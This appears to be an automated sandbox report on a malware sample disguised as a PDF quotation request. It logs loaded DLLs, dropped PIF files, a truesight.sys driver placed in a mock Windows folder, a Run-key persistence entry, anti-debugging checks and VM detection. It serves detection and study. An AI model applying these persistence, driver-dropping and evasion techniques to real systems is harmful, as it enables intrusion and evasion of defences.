                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Static file information: File size 1525248 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Csswqtmk.PIF, kmtqwssC.pif
                      Source: Binary string: easinvoker.pdb source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Csswqtmk.PIF, kmtqwssC.pif
                      Source: Binary string: wntdll.pdbUGP source: kmtqwssC.pif
                      Source: Binary string: wntdll.pdb source: kmtqwssC.pif
                      Source: Binary string: easinvoker.pdbGCTL source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Csswqtmk.PIF, kmtqwssC.pif

                      Data Obfuscation

                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Unpacked PE file: 6.2.kmtqwssC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Unpacked PE file: 12.2.kmtqwssC.pif.400000.3.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Unpacked PE file: 16.2.kmtqwssC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: Yara match File source: 1.2.RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe.24665a8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 1.2.RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe.2950000.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 1.2.RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe.24665a8.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000001.00000002.1454887836.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000010.00000002.2043784716.0000000001360000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000010.00000001.1672552256.0000000001360000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000C.00000001.1542389748.0000000001360000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000C.00000002.1977379900.0000000001360000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000001.00000002.1415147873.0000000002466000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: kmtqwssC.pif.1.dr Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_029687A0 LoadLibraryW,GetProcAddress,FreeLibrary, 1_2_029687A0
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_029532FC push eax; ret 1_2_02953338
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0297C2FC push 0297C367h; ret 1_2_0297C35F
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0295635C push 029563B7h; ret 1_2_029563AF
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0295635A push 029563B7h; ret 1_2_029563AF
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0297C0AC push 0297C125h; ret 1_2_0297C11D
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0297C1F8 push 0297C288h; ret 1_2_0297C280
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0297C144 push 0297C1ECh; ret 1_2_0297C1E4
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_029686C0 push 02968702h; ret 1_2_029686FA
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0295673E push 02956782h; ret 1_2_0295677A
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_02956740 push 02956782h; ret 1_2_0295677A
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0295C4F4 push ecx; mov dword ptr [esp], edx 1_2_0295C4F9
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0296E5B4 push ecx; mov dword ptr [esp], edx 1_2_0296E5B9
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0295D528 push 0295D554h; ret 1_2_0295D54C
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0295CB74 push 0295CCFAh; ret 1_2_0295CCF2
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0297BB6C push 0297BD94h; ret 1_2_0297BD8C
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_02967894 push 02967911h; ret 1_2_02967909
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_029668D0 push 0296697Bh; ret 1_2_02966973
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_029668CE push 0296697Bh; ret 1_2_02966973
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_02968916 push 02968950h; ret 1_2_02968948
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_02968918 push 02968950h; ret 1_2_02968948
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0296A920 push 0296A958h; ret 1_2_0296A950
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0295C976 push 0295CCFAh; ret 1_2_0295CCF2
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_02962EE8 push 02962F5Eh; ret 1_2_02962F56
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_02965E04 push ecx; mov dword ptr [esp], edx 1_2_02965E06
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_02962FF4 push 02963041h; ret 1_2_02963039
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_02962FF3 push 02963041h; ret 1_2_02963039
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Code function: 6_2_0040D99D push esp; iretd 6_2_0040D99E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Code function: 6_2_00416373 push ds; iretd 6_2_00416372
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Code function: 6_2_00416305 push ds; iretd 6_2_00416372
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Code function: 6_2_004163B1 push ds; iretd 6_2_00416372
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Code function: 6_2_004034E0 push eax; ret 6_2_004034E2

                      Persistence and Installation Behavior

                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe File created: C:\Users\Public\Libraries\kmtqwssC.pif
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe File created: C:\Users\Public\Libraries\Csswqtmk.PIF
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe File created: C:\Windows \SysWOW64\truesight.sys
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF File created: C:\Windows \SysWOW64\truesight.sys
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe File created: \rtd20241038ii listed parts and quotation request ,pdf.scr.exe
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Csswqtmk
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0296A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0296A95C
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exe
                      Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF
                      Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exe
                      Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory allocated: 2890000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory allocated: 2891000 memory commit 500178944
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory allocated: 28BC000 memory commit 500002816
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory allocated: 28BD000 memory commit 500199424
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory allocated: 28EE000 memory commit 501014528
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory allocated: 29E6000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory allocated: 29E8000 memory commit 500015104
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Memory allocated: 2950000 memory commit 500006912
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Memory allocated: 2951000 memory commit 500178944
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Memory allocated: 297C000 memory commit 500002816
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Memory allocated: 297D000 memory commit 500199424
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Memory allocated: 29AE000 memory commit 501014528
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Memory allocated: 2AA6000 memory commit 500006912
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Memory allocated: 2AA8000 memory commit 500015104
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory allocated: 2880000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory allocated: 2881000 memory commit 500178944
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory allocated: 28AC000 memory commit 500002816
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory allocated: 28AD000 memory commit 500199424
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory allocated: 28DE000 memory commit 501014528
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory allocated: 29D6000 memory commit 500006912
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory allocated: 29D8000 memory commit 500015104
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Code function: 6_2_2CE1096E rdtsc 6_2_2CE1096E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif API coverage: 0.7 %
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif API coverage: 0.3 %
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif TID: 7220 Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif TID: 7648 Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif TID: 7972 Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_029558B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 1_2_029558B4
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.0000000000972000.00000004.00000020.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.000000000090E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.0000000000972000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW3d
                      Source: Csswqtmk.PIF, 00000008.00000002.1543370481.000000000067B000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000002.1657443974.0000000000768000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe API call chain: ExitProcess graph end node graph_1-29198
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Process information queried: ProcessInformation

                      Anti Debugging

                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_0296EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 1_2_0296EBF0
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Process queried: DebugPort
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Process queried: DebugPort
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Process queried: DebugPort
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Code function: 6_2_2CE1096E rdtsc 6_2_2CE1096E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Code function: 6_2_00417B33 LdrLoadDll, 6_2_00417B33
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Code function: 1_2_029687A0 LoadLibraryW,GetProcAddress,FreeLibrary, 1_2_029687A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Code function: 6_2_2CE02CF0 mov eax, dword ptr fs:[00000030h] 6_2_2CE02CF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE74F42 mov eax, dword ptr fs:[00000030h]6_2_2CE74F42
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CF50 mov eax, dword ptr fs:[00000030h]6_2_2CE0CF50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFAF69 mov eax, dword ptr fs:[00000030h]6_2_2CDFAF69
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFAF69 mov eax, dword ptr fs:[00000030h]6_2_2CDFAF69
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE70F50 mov eax, dword ptr fs:[00000030h]6_2_2CE70F50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD2F12 mov eax, dword ptr fs:[00000030h]6_2_2CDD2F12
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE86F00 mov eax, dword ptr fs:[00000030h]6_2_2CE86F00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFEF28 mov eax, dword ptr fs:[00000030h]6_2_2CDFEF28
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CF1F mov eax, dword ptr fs:[00000030h]6_2_2CE0CF1F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9A8E4 mov eax, dword ptr fs:[00000030h]6_2_2CE9A8E4
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0C8F9 mov eax, dword ptr fs:[00000030h]6_2_2CE0C8F9
